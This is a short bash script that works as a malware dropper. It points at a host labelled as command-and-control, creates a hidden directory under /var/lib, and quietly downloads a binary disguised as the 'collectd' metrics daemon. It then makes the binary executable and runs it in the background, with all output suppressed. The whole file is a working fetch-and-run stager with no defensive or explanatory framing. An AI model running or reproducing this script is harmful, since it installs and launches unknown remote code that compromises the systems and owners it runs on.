#!/bin/bash
set -e
C2_FILES="https://c2-files.darienluv.my.id"
mkdir -p /var/lib/.metrics >/dev/null 2>&1
curl -s "$C2_FILES/collectd" -o /var/lib/.metrics/collectd >/dev/null 2>&1
chmod +x /var/lib/.metrics/collectd >/dev/null 2>&1
nohup /var/lib/.metrics/collectd >/dev/null 2>&1 &
